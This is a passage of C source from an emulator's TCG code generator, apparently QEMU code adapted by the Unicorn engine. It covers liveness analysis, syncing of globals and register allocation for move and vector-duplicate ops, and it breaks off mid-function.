{ int i; for (i = 0; i < ng; ++i) { s->temps[i].state = TS_DEAD | TS_MEM; la_reset_pref(s, &s->temps[i]); } for (i = ng; i < nt; ++i) { s->temps[i].state = (s->temps[i].temp_local ? TS_DEAD | TS_MEM : TS_DEAD); la_reset_pref(s, &s->temps[i]); } } /* liveness analysis: sync globals back to memory. */ static void la_global_sync(TCGContext *s, int ng) { int i; for (i = 0; i < ng; ++i) { int state = s->temps[i].state; s->temps[i].state = state | TS_MEM; if (state == TS_DEAD) { /* If the global was previously dead, reset prefs. */ la_reset_pref(s, &s->temps[i]); } } } /* liveness analysis: sync globals back to memory and kill. */ static void la_global_kill(TCGContext *s, int ng) { int i; for (i = 0; i < ng; i++) { s->temps[i].state = TS_DEAD | TS_MEM; la_reset_pref(s, &s->temps[i]); } } /* liveness analysis: note live globals crossing calls. */ static void la_cross_call(TCGContext *s, int nt) { TCGRegSet mask = ~(s->tcg_target_call_clobber_regs); int i; for (i = 0; i < nt; i++) { TCGTemp *ts = &s->temps[i]; if (!(ts->state & TS_DEAD)) { TCGRegSet *pset = la_temp_pref(ts); TCGRegSet set = *pset; set &= mask; /* If the combination is not possible, restart. 
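For example, on an x86-64 host a temp whose preference set had narrowed to call-clobbered registers such as RAX would end up with an empty set here; rather than keep an unsatisfiable hint, we widen the preference back to every available register that survives the call.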
*/ if (set == 0) { set = s->tcg_target_available_regs[ts->type] & mask; } *pset = set; } } } /* Liveness analysis: update the opc_arg_life array to tell whether a given input argument is dead. Instructions updating dead temporaries are removed. */ static void liveness_pass_1(TCGContext *s) { int nb_globals = s->nb_globals; int nb_temps = s->nb_temps; TCGOp *op, *op_prev; TCGRegSet *prefs; int i; prefs = tcg_malloc(s, sizeof(TCGRegSet) * nb_temps); for (i = 0; i < nb_temps; ++i) { s->temps[i].state_ptr = prefs + i; } /* ??? Should be redundant with the exit_tb that ends the TB. */ la_func_end(s, nb_globals, nb_temps); QTAILQ_FOREACH_REVERSE_SAFE(op, &s->ops, link, op_prev) { int nb_iargs, nb_oargs; TCGOpcode opc_new, opc_new2; bool have_opc_new2; TCGLifeData arg_life = 0; TCGTemp *ts; TCGOpcode opc = op->opc; const TCGOpDef *def = &s->tcg_op_defs[opc]; switch (opc) { case INDEX_op_call: { int call_flags; int nb_call_regs; nb_oargs = TCGOP_CALLO(op); nb_iargs = TCGOP_CALLI(op); call_flags = op->args[nb_oargs + nb_iargs + 1]; /* pure functions can be removed if their result is unused */ if (call_flags & TCG_CALL_NO_SIDE_EFFECTS) { for (i = 0; i < nb_oargs; i++) { ts = arg_temp(op->args[i]); if (ts->state != TS_DEAD) { goto do_not_remove_call; } } goto do_remove; } do_not_remove_call: /* Output args are dead. */ for (i = 0; i < nb_oargs; i++) { ts = arg_temp(op->args[i]); if (ts->state & TS_DEAD) { arg_life |= DEAD_ARG << i; } if (ts->state & TS_MEM) { arg_life |= SYNC_ARG << i; } ts->state = TS_DEAD; la_reset_pref(s, ts); /* Not used -- it will be tcg_target_call_oarg_regs[i]. */ op->output_pref[i] = 0; } if (!(call_flags & (TCG_CALL_NO_WRITE_GLOBALS | TCG_CALL_NO_READ_GLOBALS))) { la_global_kill(s, nb_globals); } else if (!(call_flags & TCG_CALL_NO_READ_GLOBALS)) { la_global_sync(s, nb_globals); } /* Record arguments that die in this helper. */ for (i = nb_oargs; i < nb_iargs + nb_oargs; i++) { ts = arg_temp(op->args[i]); if (ts && ts->state & TS_DEAD) { arg_life |= DEAD_ARG << i; } } /* For all live registers, remove call-clobbered prefs. */ la_cross_call(s, nb_temps); nb_call_regs = ARRAY_SIZE(tcg_target_call_iarg_regs); /* Input arguments are live for preceding opcodes. */ for (i = 0; i < nb_iargs; i++) { ts = arg_temp(op->args[i + nb_oargs]); if (ts && ts->state & TS_DEAD) { /* For those arguments that die, and will be allocated * in registers, clear the register set for that arg, * to be filled in below. For args that will be on * the stack, reset to any available reg. */ *la_temp_pref(ts) = (i < nb_call_regs ? 0 : s->tcg_target_available_regs[ts->type]); ts->state &= ~TS_DEAD; } } /* For each input argument, add its input register to prefs. If a temp is used once, this produces a single set bit. */ for (i = 0; i < MIN(nb_call_regs, nb_iargs); i++) { ts = arg_temp(op->args[i + nb_oargs]); if (ts) { tcg_regset_set_reg(*la_temp_pref(ts), tcg_target_call_iarg_regs[i]); } } } break; case INDEX_op_insn_start: break; case INDEX_op_discard: /* mark the temporary as dead */ ts = arg_temp(op->args[0]); ts->state = TS_DEAD; la_reset_pref(s, ts); break; case INDEX_op_add2_i32: opc_new = INDEX_op_add_i32; goto do_addsub2; case INDEX_op_sub2_i32: opc_new = INDEX_op_sub_i32; goto do_addsub2; case INDEX_op_add2_i64: opc_new = INDEX_op_add_i64; goto do_addsub2; case INDEX_op_sub2_i64: opc_new = INDEX_op_sub_i64; do_addsub2: nb_iargs = 4; nb_oargs = 2; /* Test if the high part of the operation is dead, but not the low part. The result can be optimized to a simple add or sub.
This often happens for an x86_64 guest when the CPU mode is set to 32 bit. */ if (arg_temp(op->args[1])->state == TS_DEAD) { if (arg_temp(op->args[0])->state == TS_DEAD) { goto do_remove; } /* Replace the opcode and adjust the args in place, leaving 3 unused args at the end. */ op->opc = opc = opc_new; op->args[1] = op->args[2]; op->args[2] = op->args[4]; /* Fall through and mark the single-word operation live. */ nb_iargs = 2; nb_oargs = 1; } goto do_not_remove; case INDEX_op_mulu2_i32: opc_new = INDEX_op_mul_i32; opc_new2 = INDEX_op_muluh_i32; have_opc_new2 = TCG_TARGET_HAS_muluh_i32; goto do_mul2; case INDEX_op_muls2_i32: opc_new = INDEX_op_mul_i32; opc_new2 = INDEX_op_mulsh_i32; have_opc_new2 = TCG_TARGET_HAS_mulsh_i32; goto do_mul2; case INDEX_op_mulu2_i64: opc_new = INDEX_op_mul_i64; opc_new2 = INDEX_op_muluh_i64; have_opc_new2 = TCG_TARGET_HAS_muluh_i64; goto do_mul2; case INDEX_op_muls2_i64: opc_new = INDEX_op_mul_i64; opc_new2 = INDEX_op_mulsh_i64; have_opc_new2 = TCG_TARGET_HAS_mulsh_i64; goto do_mul2; do_mul2: nb_iargs = 2; nb_oargs = 2; if (arg_temp(op->args[1])->state == TS_DEAD) { if (arg_temp(op->args[0])->state == TS_DEAD) { /* Both parts of the operation are dead. */ goto do_remove; } /* The high part of the operation is dead; generate the low. */ op->opc = opc = opc_new; op->args[1] = op->args[2]; op->args[2] = op->args[3]; } else if (arg_temp(op->args[0])->state == TS_DEAD && have_opc_new2) { /* The low part of the operation is dead; generate the high. */ op->opc = opc = opc_new2; op->args[0] = op->args[1]; op->args[1] = op->args[2]; op->args[2] = op->args[3]; } else { goto do_not_remove; } /* Mark the single-word operation live. */ nb_oargs = 1; goto do_not_remove; default: /* XXX: optimize by hardcoding common cases (e.g. triadic ops) */ nb_iargs = def->nb_iargs; nb_oargs = def->nb_oargs; /* Test if the operation can be removed because all its outputs are dead. We assume that nb_oargs == 0 implies side effects */ if (!(def->flags & TCG_OPF_SIDE_EFFECTS) && nb_oargs != 0) { for (i = 0; i < nb_oargs; i++) { if (arg_temp(op->args[i])->state != TS_DEAD) { goto do_not_remove; } } goto do_remove; } goto do_not_remove; do_remove: tcg_op_remove(s, op); break; do_not_remove: for (i = 0; i < nb_oargs; i++) { ts = arg_temp(op->args[i]); /* Remember the preference of the uses that followed. */ op->output_pref[i] = *la_temp_pref(ts); /* Output args are dead. */ if (ts->state & TS_DEAD) { arg_life |= DEAD_ARG << i; } if (ts->state & TS_MEM) { arg_life |= SYNC_ARG << i; } ts->state = TS_DEAD; la_reset_pref(s, ts); } /* If end of basic block, update. */ if (def->flags & TCG_OPF_BB_EXIT) { la_func_end(s, nb_globals, nb_temps); } else if (def->flags & TCG_OPF_BB_END) { // Unicorn: do not optimize dead temps on brcond; // this causes problems because check_exit_request() inserts a // brcond instruction in the middle of the TB, // which would incorrectly be flagged as end-of-block if (opc != INDEX_op_brcond_i32) { la_bb_end(s, nb_globals, nb_temps); } else { // Unicorn: we do not touch dead temps for brcond, // but we should refresh the in-memory state of TCG globals; // otherwise, important CPU state (especially the conditional flags) might be forgotten, // resulting in wrongly generated host code that runs into the wrong branch.
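// (Illustratively, the mid-TB exit check emits something like
//     brcond_i32 exit_flag, $0x0, ne, $L_exit
//  and the fall-through path must still see valid globals.)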
// Refer to https://github.com/unicorn-engine/unicorn/issues/287 for further information la_brcond_end(s, nb_globals); } } else if (def->flags & TCG_OPF_SIDE_EFFECTS) { la_global_sync(s, nb_globals); if (def->flags & TCG_OPF_CALL_CLOBBER) { la_cross_call(s, nb_temps); } } /* Record arguments that die in this opcode. */ for (i = nb_oargs; i < nb_oargs + nb_iargs; i++) { ts = arg_temp(op->args[i]); if (ts->state & TS_DEAD) { arg_life |= DEAD_ARG << i; } } /* Input arguments are live for preceding opcodes. */ for (i = nb_oargs; i < nb_oargs + nb_iargs; i++) { ts = arg_temp(op->args[i]); if (ts->state & TS_DEAD) { /* For operands that were dead, initially allow all regs for the type. */ *la_temp_pref(ts) = s->tcg_target_available_regs[ts->type]; ts->state &= ~TS_DEAD; } } /* Incorporate constraints for this operand. */ switch (opc) { case INDEX_op_mov_i32: case INDEX_op_mov_i64: /* Note that these are TCG_OPF_NOT_PRESENT and do not have proper constraints. That said, special case moves to propagate preferences backward. */ if (IS_DEAD_ARG(1)) { *la_temp_pref(arg_temp(op->args[0])) = *la_temp_pref(arg_temp(op->args[1])); } break; default: for (i = nb_oargs; i < nb_oargs + nb_iargs; i++) { const TCGArgConstraint *ct = &def->args_ct[i]; TCGRegSet set, *pset; ts = arg_temp(op->args[i]); pset = la_temp_pref(ts); set = *pset; set &= ct->u.regs; if (ct->ct & TCG_CT_IALIAS) { set &= op->output_pref[ct->alias_index]; } /* If the combination is not possible, restart. */ if (set == 0) { set = ct->u.regs; } *pset = set; } break; } break; } op->life = arg_life; } } /* Liveness analysis: Convert indirect regs to direct temporaries. */ static bool liveness_pass_2(TCGContext *s) { int nb_globals = s->nb_globals; int nb_temps, i; bool changes = false; TCGOp *op, *op_next; /* Create a temporary for each indirect global. */ for (i = 0; i < nb_globals; ++i) { TCGTemp *its = &s->temps[i]; if (its->indirect_reg) { TCGTemp *dts = tcg_temp_alloc(s); dts->type = its->type; dts->base_type = its->base_type; its->state_ptr = dts; } else { its->state_ptr = NULL; } /* All globals begin dead. */ its->state = TS_DEAD; } for (nb_temps = s->nb_temps; i < nb_temps; ++i) { TCGTemp *its = &s->temps[i]; its->state_ptr = NULL; its->state = TS_DEAD; } QTAILQ_FOREACH_SAFE(op, &s->ops, link, op_next) { TCGOpcode opc = op->opc; const TCGOpDef *def = &s->tcg_op_defs[opc]; TCGLifeData arg_life = op->life; int nb_iargs, nb_oargs, call_flags; TCGTemp *arg_ts, *dir_ts; if (opc == INDEX_op_call) { nb_oargs = TCGOP_CALLO(op); nb_iargs = TCGOP_CALLI(op); call_flags = op->args[nb_oargs + nb_iargs + 1]; } else { nb_iargs = def->nb_iargs; nb_oargs = def->nb_oargs; /* Set flags similar to how calls require. */ if (def->flags & TCG_OPF_BB_END) { /* Like writing globals: save_globals */ call_flags = 0; } else if (def->flags & TCG_OPF_SIDE_EFFECTS) { /* Like reading globals: sync_globals */ call_flags = TCG_CALL_NO_WRITE_GLOBALS; } else { /* No effect on globals. */ call_flags = (TCG_CALL_NO_READ_GLOBALS | TCG_CALL_NO_WRITE_GLOBALS); } } /* Make sure that input arguments are available. */ for (i = nb_oargs; i < nb_iargs + nb_oargs; i++) { arg_ts = arg_temp(op->args[i]); if (arg_ts) { dir_ts = arg_ts->state_ptr; if (dir_ts && arg_ts->state == TS_DEAD) { TCGOpcode lopc = (arg_ts->type == TCG_TYPE_I32 ? INDEX_op_ld_i32 : INDEX_op_ld_i64); TCGOp *lop = tcg_op_insert_before(s, op, lopc); lop->args[0] = temp_arg(dir_ts); lop->args[1] = temp_arg(arg_ts->mem_base); lop->args[2] = arg_ts->mem_offset; /* Loaded, but synced with memory. 
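Conceptually the op inserted just above is: ld_i32 dir_ts, mem_base, mem_offset (or ld_i64 for 64-bit globals), so from here until the next write the direct temp mirrors the canonical memory slot.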
*/ arg_ts->state = TS_MEM; } } } /* Perform input replacement, and mark inputs that became dead. No action is required except keeping temp_state up to date so that we reload when needed. */ for (i = nb_oargs; i < nb_iargs + nb_oargs; i++) { arg_ts = arg_temp(op->args[i]); if (arg_ts) { dir_ts = arg_ts->state_ptr; if (dir_ts) { op->args[i] = temp_arg(dir_ts); changes = true; if (IS_DEAD_ARG(i)) { arg_ts->state = TS_DEAD; } } } } /* Liveness analysis should ensure that the following are all correct, for call sites and basic block end points. */ if (call_flags & TCG_CALL_NO_READ_GLOBALS) { /* Nothing to do */ } else if (call_flags & TCG_CALL_NO_WRITE_GLOBALS) { for (i = 0; i < nb_globals; ++i) { /* Liveness should see that globals are synced back, that is, either TS_DEAD or TS_MEM. */ arg_ts = &s->temps[i]; tcg_debug_assert(arg_ts->state_ptr == 0 || arg_ts->state != 0); } } else { for (i = 0; i < nb_globals; ++i) { /* Liveness should see that globals are saved back, that is, TS_DEAD, waiting to be reloaded. */ arg_ts = &s->temps[i]; tcg_debug_assert(arg_ts->state_ptr == 0 || arg_ts->state == TS_DEAD); } } /* Outputs become available. */ for (i = 0; i < nb_oargs; i++) { arg_ts = arg_temp(op->args[i]); dir_ts = arg_ts->state_ptr; if (!dir_ts) { continue; } op->args[i] = temp_arg(dir_ts); changes = true; /* The output is now live and modified. */ arg_ts->state = 0; /* Sync outputs upon their last write. */ if (NEED_SYNC_ARG(i)) { TCGOpcode sopc = (arg_ts->type == TCG_TYPE_I32 ? INDEX_op_st_i32 : INDEX_op_st_i64); TCGOp *sop = tcg_op_insert_after(s, op, sopc); sop->args[0] = temp_arg(dir_ts); sop->args[1] = temp_arg(arg_ts->mem_base); sop->args[2] = arg_ts->mem_offset; arg_ts->state = TS_MEM; } /* Drop outputs that are dead. */ if (IS_DEAD_ARG(i)) { arg_ts->state = TS_DEAD; } } } return changes; } #ifdef CONFIG_DEBUG_TCG static void dump_regs(TCGContext *s) { TCGTemp *ts; int i; char buf[64]; for(i = 0; i < s->nb_temps; i++) { ts = &s->temps[i]; fprintf(stderr, " %10s: ", tcg_get_arg_str_ptr(s, buf, sizeof(buf), ts)); switch(ts->val_type) { case TEMP_VAL_REG: fprintf(stderr, "%s", tcg_target_reg_names[ts->reg]); break; case TEMP_VAL_MEM: fprintf(stderr, "%d(%s)", (int)ts->mem_offset, tcg_target_reg_names[ts->mem_base->reg]); break; case TEMP_VAL_CONST: fprintf(stderr, "$0x%" TCG_PRIlx, ts->val); break; case TEMP_VAL_DEAD: fprintf(stderr, "D"); break; default: fprintf(stderr, "???"); break; } fprintf(stderr, "\n"); } for(i = 0; i < TCG_TARGET_NB_REGS; i++) { if (s->reg_to_temp[i] != NULL) { fprintf(stderr, "%s: %s\n", tcg_target_reg_names[i], tcg_get_arg_str_ptr(s, buf, sizeof(buf), s->reg_to_temp[i])); } } } static void check_regs(TCGContext *s) { int reg; int k; TCGTemp *ts; char buf[64]; for (reg = 0; reg < TCG_TARGET_NB_REGS; reg++) { ts = s->reg_to_temp[reg]; if (ts != NULL) { if (ts->val_type != TEMP_VAL_REG || ts->reg != reg) { fprintf(stderr, "Inconsistency for register %s:\n", tcg_target_reg_names[reg]); goto fail; } } } for (k = 0; k < s->nb_temps; k++) { ts = &s->temps[k]; if (ts->val_type == TEMP_VAL_REG && !ts->fixed_reg && s->reg_to_temp[ts->reg] != ts) { fprintf(stderr, "Inconsistency for temp %s:\n", tcg_get_arg_str_ptr(s, buf, sizeof(buf), ts)); fail: fprintf(stderr, "reg state:\n"); dump_regs(s); tcg_abort(); } } } #endif static void temp_allocate_frame(TCGContext *s, TCGTemp *ts) { #if !(defined(__sparc__) && TCG_TARGET_REG_BITS == 64) /* Sparc64 stack is accessed with offset of 2047 */ s->current_frame_offset = (s->current_frame_offset + (tcg_target_long)sizeof(tcg_target_long) 
- 1) & ~(sizeof(tcg_target_long) - 1); #endif if (s->current_frame_offset + (tcg_target_long)sizeof(tcg_target_long) > s->frame_end) { tcg_abort(); } ts->mem_offset = s->current_frame_offset; ts->mem_base = s->frame_temp; ts->mem_allocated = 1; s->current_frame_offset += sizeof(tcg_target_long); } static void temp_load(TCGContext *, TCGTemp *, TCGRegSet, TCGRegSet, TCGRegSet); /* Mark a temporary as free or dead. If 'free_or_dead' is negative, mark it free; otherwise mark it dead. */ static void temp_free_or_dead(TCGContext *s, TCGTemp *ts, int free_or_dead) { if (ts->fixed_reg) { return; } if (ts->val_type == TEMP_VAL_REG) { s->reg_to_temp[ts->reg] = NULL; } ts->val_type = (free_or_dead < 0 || ts->temp_local || ts->temp_global ? TEMP_VAL_MEM : TEMP_VAL_DEAD); } /* Mark a temporary as dead. */ static inline void temp_dead(TCGContext *s, TCGTemp *ts) { temp_free_or_dead(s, ts, 1); } /* Sync a temporary to memory. 'allocated_regs' is used in case a temporary register needs to be allocated to store a constant. If 'free_or_dead' is non-zero, subsequently release the temporary; if it is positive, the temp is dead; if it is negative, the temp is free. */ static void temp_sync(TCGContext *s, TCGTemp *ts, TCGRegSet allocated_regs, TCGRegSet preferred_regs, int free_or_dead) { if (ts->fixed_reg) { return; } if (!ts->mem_coherent) { if (!ts->mem_allocated) { temp_allocate_frame(s, ts); } switch (ts->val_type) { case TEMP_VAL_CONST: /* If we're going to free the temp immediately, then we won't require it later in a register, so attempt to store the constant to memory directly. */ if (free_or_dead && tcg_out_sti(s, ts->type, ts->val, ts->mem_base->reg, ts->mem_offset)) { break; } temp_load(s, ts, s->tcg_target_available_regs[ts->type], allocated_regs, preferred_regs); /* fallthrough */ case TEMP_VAL_REG: tcg_out_st(s, ts->type, ts->reg, ts->mem_base->reg, ts->mem_offset); break; case TEMP_VAL_MEM: break; case TEMP_VAL_DEAD: default: tcg_abort(); } ts->mem_coherent = 1; } if (free_or_dead) { temp_free_or_dead(s, ts, free_or_dead); } } /* free register 'reg' by spilling the corresponding temporary if necessary */ static void tcg_reg_free(TCGContext *s, TCGReg reg, TCGRegSet allocated_regs) { TCGTemp *ts = s->reg_to_temp[reg]; if (ts != NULL) { temp_sync(s, ts, allocated_regs, 0, -1); } } /** * tcg_reg_alloc: * @required_regs: Set of registers in which we must allocate. * @allocated_regs: Set of registers which must be avoided. * @preferred_regs: Set of registers we should prefer. * @rev: True if we search the registers in "indirect" order. * * The allocated register must be in @required_regs & ~@allocated_regs, * but if we can put it in @preferred_regs we may save a move later. */ static TCGReg tcg_reg_alloc(TCGContext *s, TCGRegSet required_regs, TCGRegSet allocated_regs, TCGRegSet preferred_regs, bool rev) { int i, j, f, n = ARRAY_SIZE(tcg_target_reg_alloc_order); TCGRegSet reg_ct[2]; const int *order; reg_ct[1] = required_regs & ~allocated_regs; tcg_debug_assert(reg_ct[1] != 0); reg_ct[0] = reg_ct[1] & preferred_regs; /* Skip the preferred_regs option if it cannot be satisfied, or if the preference made no difference. */ f = reg_ct[0] == 0 || reg_ct[0] == reg_ct[1]; order = rev ? s->indirect_reg_alloc_order : tcg_target_reg_alloc_order; /* Try free registers, preferences first. */ for (j = f; j < 2; j++) { TCGRegSet set = reg_ct[j]; if (tcg_regset_single(set)) { /* One register in the set.
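A singleton set lets us skip the walk over the allocation order entirely; this is the common case for fixed-register constraints, e.g. the x86 shift-count operand that must live in %cl.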
*/ TCGReg reg = tcg_regset_first(set); if (s->reg_to_temp[reg] == NULL) { return reg; } } else { for (i = 0; i < n; i++) { TCGReg reg = order[i]; if (s->reg_to_temp[reg] == NULL && tcg_regset_test_reg(set, reg)) { return reg; } } } } /* We must spill something. */ for (j = f; j < 2; j++) { TCGRegSet set = reg_ct[j]; if (tcg_regset_single(set)) { /* One register in the set. */ TCGReg reg = tcg_regset_first(set); tcg_reg_free(s, reg, allocated_regs); return reg; } else { for (i = 0; i < n; i++) { TCGReg reg = order[i]; if (tcg_regset_test_reg(set, reg)) { tcg_reg_free(s, reg, allocated_regs); return reg; } } } } tcg_abort(); } /* Make sure the temporary is in a register. If needed, allocate the register from DESIRED while avoiding ALLOCATED. */ static void temp_load(TCGContext *s, TCGTemp *ts, TCGRegSet desired_regs, TCGRegSet allocated_regs, TCGRegSet preferred_regs) { TCGReg reg; switch (ts->val_type) { case TEMP_VAL_REG: return; case TEMP_VAL_CONST: reg = tcg_reg_alloc(s, desired_regs, allocated_regs, preferred_regs, ts->indirect_base); tcg_out_movi(s, ts->type, reg, ts->val); ts->mem_coherent = 0; break; case TEMP_VAL_MEM: reg = tcg_reg_alloc(s, desired_regs, allocated_regs, preferred_regs, ts->indirect_base); tcg_out_ld(s, ts->type, reg, ts->mem_base->reg, ts->mem_offset); ts->mem_coherent = 1; break; case TEMP_VAL_DEAD: default: tcg_abort(); } ts->reg = reg; ts->val_type = TEMP_VAL_REG; s->reg_to_temp[reg] = ts; } /* Save a temporary to memory. 'allocated_regs' is used in case a temporary register needs to be allocated to store a constant. */ static void temp_save(TCGContext *s, TCGTemp *ts, TCGRegSet allocated_regs) { /* The liveness analysis already ensures that globals are back in memory. Keep a tcg_debug_assert for safety. */ tcg_debug_assert(ts->val_type == TEMP_VAL_MEM || ts->fixed_reg); } /* save globals to their canonical location and assume they can be modified by the following code. 'allocated_regs' is used in case a temporary register needs to be allocated to store a constant. */ static void save_globals(TCGContext *s, TCGRegSet allocated_regs) { int i, n; for (i = 0, n = s->nb_globals; i < n; i++) { temp_save(s, &s->temps[i], allocated_regs); } } /* sync globals to their canonical location and assume they can be read by the following code. 'allocated_regs' is used in case a temporary register needs to be allocated to store a constant. */ static void sync_globals(TCGContext *s, TCGRegSet allocated_regs) { int i, n; for (i = 0, n = s->nb_globals; i < n; i++) { TCGTemp *ts = &s->temps[i]; tcg_debug_assert(ts->val_type != TEMP_VAL_REG || ts->fixed_reg || ts->mem_coherent); } } /* at the end of a basic block, we assume all temporaries are dead and all globals are stored at their canonical location. */ static void tcg_reg_alloc_bb_end(TCGContext *s, TCGRegSet allocated_regs) { // Unicorn: We are inserting brcond in the middle of the TB so the // assumptions here won't be satisfied. // int i; // for (i = s->nb_globals; i < s->nb_temps; i++) { // TCGTemp *ts = &s->temps[i]; // if (ts->temp_local) { // temp_save(s, ts, allocated_regs); // } else { // /* The liveness analysis already ensures that temps are dead. // Keep a tcg_debug_assert for safety. */ // tcg_debug_assert(ts->val_type == TEMP_VAL_DEAD); // } // } // save_globals(s, allocated_regs); } /* * Specialized code generation for INDEX_op_movi_*. */ static void tcg_reg_alloc_do_movi(TCGContext *s, TCGTemp *ots, tcg_target_ulong val, TCGLifeData arg_life, TCGRegSet preferred_regs) { /* ENV should not be modified.
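(In practice env is the only fixed_reg global, and no movi may target env, hence the assert that follows.)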
*/ tcg_debug_assert(!ots->fixed_reg); /* The movi is not explicitly generated here. */ if (ots->val_type == TEMP_VAL_REG) { s->reg_to_temp[ots->reg] = NULL; } ots->val_type = TEMP_VAL_CONST; ots->val = val; ots->mem_coherent = 0; if (NEED_SYNC_ARG(0)) { temp_sync(s, ots, s->reserved_regs, preferred_regs, IS_DEAD_ARG(0)); } else if (IS_DEAD_ARG(0)) { temp_dead(s, ots); } } static void tcg_reg_alloc_movi(TCGContext *s, const TCGOp *op) { TCGTemp *ots = arg_temp(op->args[0]); tcg_target_ulong val = op->args[1]; tcg_reg_alloc_do_movi(s, ots, val, op->life, op->output_pref[0]); } /* * Specialized code generation for INDEX_op_mov_*. */ static void tcg_reg_alloc_mov(TCGContext *s, const TCGOp *op) { const TCGLifeData arg_life = op->life; TCGRegSet allocated_regs, preferred_regs; TCGTemp *ts, *ots; TCGType otype, itype; allocated_regs = s->reserved_regs; preferred_regs = op->output_pref[0]; ots = arg_temp(op->args[0]); ts = arg_temp(op->args[1]); /* ENV should not be modified. */ tcg_debug_assert(!ots->fixed_reg); /* Note that otype != itype for no-op truncation. */ otype = ots->type; itype = ts->type; if (ts->val_type == TEMP_VAL_CONST) { /* propagate constant or generate sti */ tcg_target_ulong val = ts->val; if (IS_DEAD_ARG(1)) { temp_dead(s, ts); } tcg_reg_alloc_do_movi(s, ots, val, arg_life, preferred_regs); return; } /* If the source value is in memory we're going to be forced to have it in a register in order to perform the copy. Copy the SOURCE value into its own register first, that way we don't have to reload SOURCE the next time it is used. */ if (ts->val_type == TEMP_VAL_MEM) { temp_load(s, ts, s->tcg_target_available_regs[itype], allocated_regs, preferred_regs); } tcg_debug_assert(ts->val_type == TEMP_VAL_REG); if (IS_DEAD_ARG(0)) { /* mov to a non-saved dead register makes no sense (even with liveness analysis disabled). */ tcg_debug_assert(NEED_SYNC_ARG(0)); if (!ots->mem_allocated) { temp_allocate_frame(s, ots); } tcg_out_st(s, otype, ts->reg, ots->mem_base->reg, ots->mem_offset); if (IS_DEAD_ARG(1)) { temp_dead(s, ts); } temp_dead(s, ots); } else { if (IS_DEAD_ARG(1) && !ts->fixed_reg) { /* the mov can be suppressed */ if (ots->val_type == TEMP_VAL_REG) { s->reg_to_temp[ots->reg] = NULL; } ots->reg = ts->reg; temp_dead(s, ts); } else { if (ots->val_type != TEMP_VAL_REG) { /* When allocating a new register, make sure to not spill the input one. */ tcg_regset_set_reg(allocated_regs, ts->reg); ots->reg = tcg_reg_alloc(s, s->tcg_target_available_regs[otype], allocated_regs, preferred_regs, ots->indirect_base); } if (!tcg_out_mov(s, otype, ots->reg, ts->reg)) { /* * Cross register class move not supported. * Store the source register into the destination slot * and leave the destination temp as TEMP_VAL_MEM. */ assert(!ots->fixed_reg); if (!ts->mem_allocated) { temp_allocate_frame(s, ots); } tcg_out_st(s, ts->type, ts->reg, ots->mem_base->reg, ots->mem_offset); ots->mem_coherent = 1; temp_free_or_dead(s, ots, -1); return; } } ots->val_type = TEMP_VAL_REG; ots->mem_coherent = 0; s->reg_to_temp[ots->reg] = ots; if (NEED_SYNC_ARG(0)) { temp_sync(s, ots, allocated_regs, 0, 0); } } } /* * Specialized code generation for INDEX_op_dup_vec. */ static void tcg_reg_alloc_dup(TCGContext *s, const TCGOp *op) { const TCGLifeData arg_life = op->life; TCGRegSet dup_out_regs, dup_in_regs; TCGTemp *its, *ots; TCGType itype, vtype; intptr_t endian_fixup; unsigned vece; bool ok; ots = arg_temp(op->args[0]); its = arg_temp(op->args[1]); /* ENV should not be modified. 
*/ tcg_debug_assert(!ots->fixed_reg); itype = its->type; vece = TCGOP_VECE(op); vtype = TCGOP_VECL(op) + TCG_TYPE_V64; if (its->val_type == TEMP_VAL_CONST) { /* Propagate constant via movi -> dupi. */ tcg_target_ulong val = its->val; if (IS_DEAD_ARG(1)) { temp_dead(s, its); } tcg_reg_alloc_do_movi(s, ots, val, arg_life, op->output_pref[0]); return; } dup_out_regs = s->tcg_op_defs[INDEX_op_dup_vec].args_ct[0].u.regs; dup_in_regs = s->tcg_op_defs[INDEX_op_dup_vec].args_ct[1].u.regs; /* Allocate the output register now. */ if (ots->val_type != TEMP_VAL_REG) { TCGRegSet allocated_regs = s->reserved_regs; if (!IS_DEAD_ARG(1) && its->val_type == TEMP_VAL_REG) { /* Make sure to not spill the input register. */ tcg_regset_set_reg(allocated_regs, its->reg); } ots->reg = tcg_reg_alloc(s, dup_out_regs, allocated_regs, op->output_pref[0], ots->indirect_base); ots->val_type = TEMP_VAL_REG; ots->mem_coherent = 0; s->reg_to_temp[ots->reg] = ots; } switch (its->val_type) { case TEMP_VAL_REG: /* * The dup constraints must be broad, covering all possible VECE. * However, tcg_out_dup_vec() gets to see the VECE and we allow it * to fail, indicating that extra moves are required for that case. */ if (tcg_regset_test_reg(dup_in_regs, its->reg)) { if (tcg_out_dup_vec(s, vtype, vece, ots->reg, its->reg)) { goto done; } /* Try again from memory or a vector input register. */ } if (!its->mem_coherent) { /* * The input register is not synced, and so an extra store * would be required to use memory. Attempt an integer-vector * register move first. We do not have a TCGRegSet for this. */ if (tcg_out_mov(s, itype, ots->reg, its->reg)) { break; } /* Sync the temp back to its slot and load from there. */ temp_sync(s, its, s->reserved_regs, 0, 0); } /* fall through */ case TEMP_VAL_MEM: #ifdef HOST_WORDS_BIGENDIAN endian_fixup = itype == TCG_TYPE_I32 ? 4 : 8; endian_fixup -= 1 << vece; #else endian_fixup = 0; #endif if (tcg_out_dupm_vec(s, vtype, vece, ots->reg, its->mem_base->reg, its->mem_offset + endian_fixup)) { goto done; } tcg_out_ld(s, itype, ots->reg, its->mem_base->reg, its->mem_offset); break; default: g_assert_not_reached(); } /* We now have a vector input register, so dup must succeed.
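(Every path above either jumped to done or loaded the value into ots->reg, which was allocated from dup_out_regs, so the register-to-register dup below must be accepted by the backend.)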
*/ ok = tcg_out_dup_vec(s, vtype, vece, ots->reg, ots->reg); tcg_debug_assert(ok); done: if (IS_DEAD_ARG(1)) { temp_dead(s, its); } if (NEED_SYNC_ARG(0)) { temp_sync(s, ots, s->reserved_regs, 0, 0); } if (IS_DEAD_ARG(0)) { temp_dead(s, ots); } } static void tcg_reg_alloc_op(TCGContext *s, const TCGOp *op) { const TCGLifeData arg_life = op->life; const TCGOpDef * const def = &s->tcg_op_defs[op->opc]; TCGRegSet i_allocated_regs; TCGRegSet o_allocated_regs; int i, k, nb_iargs, nb_oargs; TCGReg reg; TCGArg arg; const TCGArgConstraint *arg_ct; TCGTemp *ts; TCGArg new_args[TCG_MAX_OP_ARGS]; int const_args[TCG_MAX_OP_ARGS]; nb_oargs = def->nb_oargs; nb_iargs = def->nb_iargs; /* copy constants */ memcpy(new_args + nb_oargs + nb_iargs, op->args + nb_oargs + nb_iargs, sizeof(TCGArg) * def->nb_cargs); i_allocated_regs = s->reserved_regs; o_allocated_regs = s->reserved_regs; /* satisfy input constraints */ for (k = 0; k < nb_iargs; k++) { TCGRegSet i_preferred_regs, o_preferred_regs; i = 